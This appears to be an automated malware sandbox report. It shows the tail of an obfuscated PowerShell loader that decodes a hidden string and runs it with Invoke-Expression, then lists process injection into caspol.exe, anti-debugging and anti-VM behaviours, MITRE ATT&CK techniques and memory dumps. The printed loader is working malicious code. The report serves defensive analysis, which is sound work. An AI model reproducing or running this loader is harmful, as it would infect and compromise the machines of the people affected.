8UdyFKodASinBAnpAAutDLys8Ade2PorFvir3FadFlokFRei8Inf4Bro8OveASka9Ant6oveBAls1VanABieBVilEBliCStiElicDdok8Cop2OesFgra3DubFCapFMik8Ove4Cig8DesAUne9Hek6DisBodo1AmpAbagBDetECouCUncEordDSup8emi2StaFLre3JesFHalFPlu8Res4Con8SpiANon9Pja6VrtBAfs1SulADasBPebEAffCgurESieDRep8Fre2EnmFRou6LadFRepFdizFPla7Gen8Ste4sel9sup6ArcBpre1LobASerBSoc8IndFFucAStrBDawAgioDHje8Sys2DelFIiw6DisFShi6NonFSub6San'Eck;bloTFlarImpiPectBryeFujlCoqeDemiDeraUnd9Min Lit`$PelASnitBorrnoniGoduFlamTidhApouCorsStrsTel6Rid;Ety`$tinvKamaFumrTes_SphnDyntPig ind=Rav SlvfHedkBetpTor Tap`$AarTLejrSkriFortinpeUntlBlreCamikaiaPro5Imb Bre`$DelTFulrOmnichitBinetrilTileUdpiIslaArv6Ark;Ult`$EgeAMastOccrImmiSemuUnfmCighInduBursJensDef7Cir Non=Gyn RelHDelTStaBTrm Int'RefFSliBSrb9PreBHemBRefEFraBmye9GuaBCar1DubBOpr6AntBcokAVegADyrDAagEdefCUdtFMucFRooEInc2RecFUniFSupFTilBEleAQue9RekBSorESkyAAkkDAdo8Rom0UdtAFri9IscBPriEHomFVvn1Taa9Reg6PlaBMet1TagAUnc9BraBSab0afhBMer4BruBVotALaeFGra7Baj8Bew4Lft9Svo6SprBTil1FalAConBjap8GlaFUndAregBKarASkrDPat8Blo2ForEKul5sukEAer5Hej8Afs5BagBSebAFreABytDKulBber0aftFUnd3decFBreFAutEDatCFirEseq9AnbEDua8DemFUnd3ObsFlreFkalEFlaFReaAAtr7BidEMicCPanEKirFKbsEAblFOblEUfoFUsaFsim3DetFfasFComEIndFFloAPla7FerETagBForEMigFLnkFReo6Nid'Doo;BreTBesrJoriPertFlyeCutlHereGigibulaFlj9Blo Tal`$RapASuptUndrSupiNicuformStihFaruTopsstusLad7Nat;Nel`$triAIndtScarPotiHoluPremAfthFtruFavsSnasMad8Goo Pyc=Dri sedHPonTDivBNex Dis'FreFEscBVokBBal0InvAStoDGerBRib6SubFdenFDatENei2MonFcloFRenFCalBudmATru9socBArkESwiAOveDRem8Unn0SpeAInd9QuaBLigEAlkFSrb1Rif9Fem6AerBSti1SejAJom9NorBSrp0UdtBNec4EmbBProAUncFMan7var8Tak4Hex9Sur6ForBEnk1TrnATekBsyn8FleFSulASkyBOveAFatDGen8Bis2LasEAna5NorEPop5Bed8Pul5EpiBhovAUlmAAfsDSpiBRep0SkaFCal3AdgFHamFZloESubFNepAfel7NonEAviECamEsueFScyEStrFDisEFrdFdyoEHenFtruELysFScoFVaa3youFExpFGleETuaFpreASnd7TaaEAriCuntEMilFStrEKicFAnkETilFSprFTov3antFEcoFGasEDiaFEncAAnt7TesEMacBAdaFPre6mas'Joa;CckTMorrPluiDagtFidePaulAereStoiFilaPla9Sub Aka`$PaiASkjtHazrIndiNeduUdsmBethKonuTynsRedsGem8Bas;dit`$RadAEtabMisbRekrHodeslvvOnaiaphafortNotePursMon1Con2Dec0fav=Rat(FerGOmneDistDon-DiaISketUnaeWesmOblPSbrrDadoBespCaneGerrengtRotyMon Mat-SaaPSelaHartGruhFas Sub'AduHOpfKDivCKonUGut:hap\NonSLadoSgefAnttPsywsekaBudrOcceCir\AlldNodiProsStrsStoeupgrReknArveUgesSky'ufo)Tra.TriSRaapChaiCaddGensAppnOutiHvanRetgDateUharLig;Dis`$TenAFurtForrFroiElouPromQuahPuluMotsLumsMuc9Pol Poc=log NecHPreTFlyBJob Rac'SkoFTriBJen9PotEUnwASmeBAleAEnkDUnmBHyp6UndAForATraBCro2HaeBTpp7ExtAkjlATraAUndCRekAKnyCBurFBesFSteESco2OveFEnsFSca8Sla4Tek8BorCRefATid6NidADiaCPsyAKaeBnonBTinAengBDat2SwaFOut1Syn9RelCAntBBag0TaaBOka1DepAJac9BraBstaACenACepDPerAducBBor8mon2RecEOut5TesEfor5Fin9Kva9TilASmeDNorBEve0RemBBef2Sta9InkDSkrBTanEBenAMapCTsaBDroAPooEGem9BriEUudBFor8TraCFulAOmvBTylANeuDClaBHit6oveBTum1IbrBAmp8HumFSub7CumFTurBAda9InjESwoBfidDProBPotDIndArenDKonBTopAHovACit9ThoBRea6OzoBkvlEPolAOveBtraBBehASheAuniCPreEIneEensESknDAppESocFNumFSad6Akr'Osa;BitTPenrflaiGldtCaleCirlTotebreiSkiaLus9laa Ene`$MakADuktKnyrTvriAneuSysmHunhPapuAppsStesHon9Rid;Bes`$MeaAHjlbNeubForrPhaeUnsvHyliRvtaImmtStoecensSis1Ron2ast0Por0Pat Sta=Afg ShaHLitTSenBAed Han'Aso8Jae4pos8MetCSepASvi6RifAFilCSeeAAerBfacBOpgAPleBPie2SabFReh1Tva8swiDProAEksAKinBUnp1FodAsubBDipBDow6EggBFor2IntBBagALitFkan1Met9Ris6SpeBBut1BilACamBIroBFreACypAProDArkBPas0ForAParFKer8skaCFruBResAEasABetDReaASpi9RemBKli6TraBAllCBarBHanASkrAAscCForFRho1Dob9rud2halBAdoEDatASnyDChaAAffCSigBRan7EreBHmnEBreBCel3Hov8skr2MenEAnt5AntEHel5tyv9QuaCpicBSym0OutASlyFBevASag6DicFPre7AdaFsekBEle9OphEFjeAVrdBDecAoveDNagBCap6BedASidANonBRuc2IngBStr7MicAProAborAVulCRemATieCEleFuns3sliFWieFFriEUdsFMinFkil3FolFDeaFDeoFPaaFMavFBliBDan9FraBSteBSikEGayBFik9TerBSig1KeyBSte6MorBTypAPrlAEpiDThrEortCKunFAut3CalFNatFsniESanCShoEron9AlvEUnd8AelFSin6Out'Bet;TreTTalrMiniLavtAmaeTrilForeGraiOriaoms9Uko Gen`$SkaAAcebDesbXylrUdseSomvSmuiSkiaLantImdeStosVal1Kol2Fej0Fri0Kom;Hem`$MynsRubiUhlzObseVid=Spe`$FunAFamtVagrConiTheuChamJdehAfruTalsBlasYap.MetcPetoNatuKolnHomtFej-chi3Fil6Fli7Bin;arr`$IbsAOopbMelbscarItiePanvQuaiNosaheltTureAtosCom1Sub2Iso0Oct1Uds Fln=Rep OphHfedTNavBAft Hvd'Bar8Ove4Pic8BesCAgiACom6AktAPalCKlaAUndBForBSecADagBMed2ForFAut1Tap8HemDIntADisAHypBNon1quaAReaBModBBef6PenBSku2FoeBNedAOveFFus1Ref9Unb6ParBRke1EmbARoiBLarBFerAZeaAtraDParBEtt0HaaADunFSpo8PerCVerBOveAKolAEpeDRetAGri9StaBlud6BonBIdiCDenBUdkACraAFauCSpiFMed1Phy9afr2StrBOnfEKatAKlaDsrbAArtCTypBSub7UndBSafEunfBPur3Mot8Eng2PlaEMic5FilEHom5pro9NitCWalBBun0StoAEksFUdlAOve6KruFIne7DruFRocBRis9DenEStrAvedBDisASdiDFagBInt6bevASkiAAnnBVal2KonBPro7EddABorAModASemCUdrAOveCPopFTav3OutFremFSchEGauCoprEcrc9VanESka8AboFSwa3devFBalFSkyFPerBiscBSph0VagANusDGraBSlu6RegFHor3AlaFTanFPreFLetBPreAStaCBlkBSpi6PolASub5TriBArtALigFAmb6Nar'Tap;MenTOverryniEmotFileLeglBloeAnaiDefaMar9San Spo`$prvAFrebBanbSporUndeRhevUsaiLogaDrntKryeSussFin1Occ2Uns0Lav1Met;Emb`$PinAFyrbChebOverAfgeOccvMidiBakaTettradeJobscom1Eta2Rnt0Hst2reg Hvi=Vol OveHTegTbesBStr Udt'SnaFWeeBTabATeh9NonBCumESpiATrkDTip8Beg0NonAFelDTolAAcaAShiBFig1GenBFin2TarBlysADekFEmnFErfEDrb2TroFBouFbar8Tod4Bin8BanCKanAper6CorAPreCIndADecBKurBFilAEncBEta2VraFHjt1Gld8JorDUdsATilATesBPor1floASpiBCelBInd6sydBTel2ForBSerAHaaFTwe1vaa9Pan6MonBRrf1ProAEquBStoBAgeAPaaAEliDkolBBir0RgeAObjFSoc8ForCRonBJunAAllAannDSinAUnd9CroBRet6SkiBDepCFasBSalAOppAQuaCDisFTra1Rev9Hyd2MicBForEostASvmDNabADyfCFllBRep7MynBlgnEJagBFne3Sti8Bes2InsEGre5LgeECop5Pre9Jor8UndBSufAGrcATerBTel9NouBDefBstiAHaaBCam3LipBCamANurBGil8SynBBayEMesAKryBSagBCelAMil9Und9EttBLat0GalAFodDAtt9Mar9ColACamAKasBNeg1RebBSynCRecADesBSkaBSun6SocBSor0BirBUne1Snd8MicFtitBUni0SpeBHes6RadBCom1FunAGraBDepBMilACisAForDKamFAto7SanFRevBLno9KulBAnaBBagEMasBLed9CynBNon1TjuBKis6BefBWiyAGerAStvDWreEOpeCsemFSic3NydFDikFMaaFUns7Bal9Rib8Sys9SokBBar8PieBForFRegFUdl9SpaFSlaFTov7Loc8Bra4Mad9Unv6LufBatr1DisAmesBAri8StoFPlaANitBIslAmytDTub8Dmm2DefFIns3Dom8Mon4Kla9Psy6FruBNon1ImpAfedBDag8SamFAerAquiBVelAHypDUds8Pio2CurFTet6WinFForFDekFGip7Red8Mar4Mot8Uko9FilBFor0OnyBTrm6HolBShoBHje8Bor2PicFGit6TraFRep6ChoFSme6non'Trk;KomTOffrGaliShotOmseVerlIsoecruiBolaBef9Lft Aur`$unpABrnbPrebTotrShaeLgevSeniSubaBentJapeSubsDen1akk2For0Gle2Sik;Leg`$FroAHanbDebbSkurHereNavvFreiUnoaStatDigeLyssKla1Dyb2Oxy0Sta3Uds leg=Hal FagHIndTBilBLav Str'UriFPurBAniAEks9DomBNonEPudASpiDUni8Bje0ForAFasDForAMetASulBEyr1LilBend2FalBRetAParFVin1Stv9Fam6CanBTjr1JenAAbb9DeuBapp0BesBska4KomBBroAHttFTan7AnsFUdsBQuaBAfp0UlrAPaaDNanBKis6UnsFKal3HugFHomBfanALaf9AggBStyEInvAshoDFot8Int0BorBMag1tonABadBDimFNon6Gol'Com;RouTPolrStriFastSwaeSenlOveeChiiCoraSte9Lg Def`$KafADetbMonbOpsrComeStavPaaiIniaStitExaeoutsCha1Nee2Cha0Sva3tro#Gaa;""";;Function Abbreviates1209 { param([String]$HS); For($i=3; $i -lt $HS.Length-1; $i+=(3+1)){ $Overfrendes240 = $Overfrendes240 + $HS.Substring($i, 1); } $Overfrendes240;}$Fwelling0 = Abbreviates1209 'BetIDroEForXKla ';$Fwelling1= Abbreviates1209 $Agneta;& ($Fwelling0) $Fwelling1;;"
  2⤵
  - Checks QEMU agent file
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Suspicious use of SetThreadContext
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: MapViewOfSection
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1960
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe"
    3⤵
    PID:1128
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe"
    3⤵
    PID:2548
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe"
    3⤵
    - Checks QEMU agent file
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    PID:2144

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Web Service

1

T1102

Credential Access

Discovery

Query Registry

2

T1012

System Information Discovery

3

T1082

Lateral Movement

Collection

Command and Control

Web Service

1

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/1960-145-0x00000000074B0000-0x0000000007B2A000-memory.dmp

Filesize
6.5MB

Download
memory/1960-141-0x00000000076E0000-0x0000000007776000-memory.dmp

Filesize
600KB

Download
memory/1960-134-0x0000000005780000-0x0000000005DA8000-memory.dmp

Filesize
6.2MB

Download
memory/1960-135-0x00000000055B0000-0x00000000055D2000-memory.dmp

Filesize
136KB

Download
memory/1960-136-0x0000000005DB0000-0x0000000005E16000-memory.dmp

Filesize
408KB

Download
memory/1960-137-0x0000000005E20000-0x0000000005E86000-memory.dmp

Filesize
408KB

Download
memory/1960-138-0x00000000062F0000-0x000000000630E000-memory.dmp

Filesize
120KB

Download
memory/1960-139-0x0000000007B30000-0x00000000081AA000-memory.dmp

Filesize
6.5MB

Download
memory/1960-140-0x00000000074B0000-0x00000000074CA000-memory.dmp

Filesize
104KB

Download
memory/1960-150-0x00000000772B0000-0x0000000077453000-memory.dmp

Filesize
1.6MB

Download
memory/1960-142-0x0000000007690000-0x00000000076B2000-memory.dmp

Filesize
136KB

Download
memory/1960-143-0x0000000008760000-0x0000000008D04000-memory.dmp

Filesize
5.6MB

Download
memory/1960-133-0x0000000004FA0000-0x0000000004FD6000-memory.dmp

Filesize
216KB

Download
memory/1960-147-0x00007FFA852F0000-0x00007FFA854E5000-memory.dmp

Filesize
2.0MB

Download
memory/1960-148-0x00000000772B0000-0x0000000077453000-memory.dmp

Filesize
1.6MB

Download
memory/1960-146-0x00000000074B0000-0x0000000007B2A000-memory.dmp

Filesize
6.5MB

Download
memory/2144-154-0x00000000772B0000-0x0000000077453000-memory.dmp

Filesize
1.6MB

Download
memory/2144-151-0x0000000000B80000-0x0000000000C80000-memory.dmp

Filesize
1024KB

Download
memory/2144-152-0x0000000000B80000-0x0000000000C80000-memory.dmp

Filesize
1024KB

Download
memory/2144-153-0x00007FFA852F0000-0x00007FFA854E5000-memory.dmp

Filesize
2.0MB

Download
memory/2144-155-0x00000000772B0000-0x0000000077453000-memory.dmp

Filesize
1.6MB

Download
memory/2144-156-0x00007FFA852F0000-0x00007FFA854E5000-memory.dmp

Filesize
2.0MB

Download
memory/2144-157-0x00000000772B0000-0x0000000077453000-memory.dmp

Filesize
1.6MB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads